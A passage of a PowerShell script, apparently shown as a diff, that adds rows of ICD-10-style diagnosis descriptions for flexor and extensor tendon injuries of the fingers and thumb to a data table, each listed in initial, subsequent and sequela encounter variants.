subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of other finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of other finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of other finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of other finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of other finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of other finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of other finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of other finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of other finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of extensor muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right middle 